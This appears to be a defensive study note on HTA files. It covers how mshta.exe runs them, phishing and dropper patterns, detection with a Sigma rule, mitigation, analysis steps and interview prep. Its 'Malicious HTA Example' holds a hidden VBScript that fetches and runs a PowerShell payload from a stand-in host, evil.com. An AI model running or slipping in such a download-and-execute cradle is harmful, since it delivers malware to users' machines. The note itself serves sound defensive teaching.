HTA (HTML Application)
HTA (HTML Application)
One-liner: A Windows file format that combines HTML/CSS/JavaScript with full desktop application privileges, frequently abused for malware delivery.
π― What Is It?
An HTA (HTML Application) is a Microsoft Windows program that uses HTML, CSS, and scripting languages (VBScript or JavaScript) to create a desktop application interface. Unlike regular web pages that run in a sandboxed browser, HTAs execute through mshta.exe with the full privileges of the userβmaking them powerful for both legitimate automation and malicious exploitation.
π€ Why It Matters
- Red Team: HTAs bypass many browser security controls and can execute arbitrary code
- Blue Team: Common initial access vector; detecting
mshta.exeexecution is critical - MITRE ATT&CK: T1218.005 β Signed Binary Proxy Execution: Mshta
π¬ How It Works
Legitimate Use Cases
- Automating administrative or setup tasks
- Providing quick interfaces for internal scripts
- Testing small prototypes without building full software
- Lightweight IT support utilities
HTA File Structure
An HTA contains three main parts:
<html>
<head>
<!-- 1. HTA Declaration - defines app properties -->
<title>TBFC Utility Tool</title>
<HTA:APPLICATION
ID="TBFCApp"
APPLICATIONNAME="Utility Tool"
BORDER="thin"
SHOWINTASKBAR="yes"
/>
</head>
<body>
<!-- 2. Interface (HTML/CSS) -->
<h3>Welcome to the Utility Tool</h3>
<!-- 3. Script (VBScript or JavaScript) -->
<script language="VBScript">
Sub RunAction()
MsgBox "Action executed!"
End Sub
</script>
</body>
</html>
Execution Flow
User opens .hta file
β
Windows launches mshta.exe
β
mshta.exe parses HTML/script
β
Script executes with user privileges
β
Can spawn child processes (powershell, cmd, etc.)
βοΈ Malicious Usage Patterns
| Pattern | Description | Example |
|---|---|---|
| Phishing Delivery | Attached to emails as "invoices" or "surveys" | salary_survey.hta |
| Downloader/Dropper | Fetches second-stage payload from C2 | Invoke-WebRequest in VBScript |
| Obfuscation | Base64/ROT13 encoded payloads | FromBase64String() |
| LOLBAS | Calls built-in Windows tools | powershell.exe, wscript.exe |
Malicious HTA Example
<HTA:APPLICATION SHOWINTASKBAR="no" WINDOWSTATE="minimize">
<script language="VBScript">
Set shell = CreateObject("WScript.Shell")
cmd = "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
shell.Run cmd, 0, False
self.close
</script>
π‘οΈ Detection & Prevention
How to Detect
- Process monitoring: Alert on
mshta.exespawning child processes (powershell.exe,cmd.exe,wscript.exe) - Command-line logging: Look for Base64 strings,
-ExecutionPolicy Bypass, or URLs in arguments - Network monitoring: Outbound HTTP/HTTPS from
mshta.exeis highly suspicious - File analysis: Scan
.htafiles forCreateObject,WScript.Shell, encoded strings
Sigma Rule Example
title: Mshta Spawning Suspicious Process
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\mshta.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\wscript.exe'
condition: selection
How to Prevent / Mitigate
- Block
.htafiles at email gateways - Restrict
mshta.exeexecution via Application Whitelisting - Use Attack Surface Reduction (ASR) rules in Windows Defender
- Disable HTA file associations via Group Policy
π Analysis Methodology
When analyzing a suspicious HTA:
- Open in text editor (never execute!)
- Check metadata:
<title>and<HTA:APPLICATION>for social engineering clues - Find script section: Look for
<script language="VBScript">or<script language="JavaScript"> - Identify functions: Search for
Function,Sub,CreateObject - Decode payloads: Extract Base64/encoded strings β decode with Cyberchef
- Trace execution flow: Follow variables to see what gets executed
π€ Interview Angles
Common Questions
- "What is an HTA file and why is it dangerous?"
- "How would you detect malicious HTA execution in a SOC?"
- "What's the difference between HTA and a regular HTML file?"
STAR Story
Situation: Received an alert for
mshta.exespawningpowershell.exewith encoded command-line arguments.
Task: Investigate whether this was malicious and determine the scope of compromise.
Action: Extracted the HTA file from email logs, decoded the Base64 payload revealing a C2 callback, identified 3 affected hosts via EDR telemetry, and isolated them.
Result: Contained the threat before data exfiltration; created detection rule that caught 2 more attempts the following week.
π Related Concepts
- Living off the Land (LOLBAS)
- mshta.exe
- Phishing
- Command and Control (C2)
- Static Analysis
- Data Exfiltration
- Encoding
π References
- MITRE ATT&CK T1218.005: https://attack.mitre.org/techniques/T1218/005/
- LOLBAS mshta.exe: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- Epsilon Red Ransomware HTA Campaign (2025)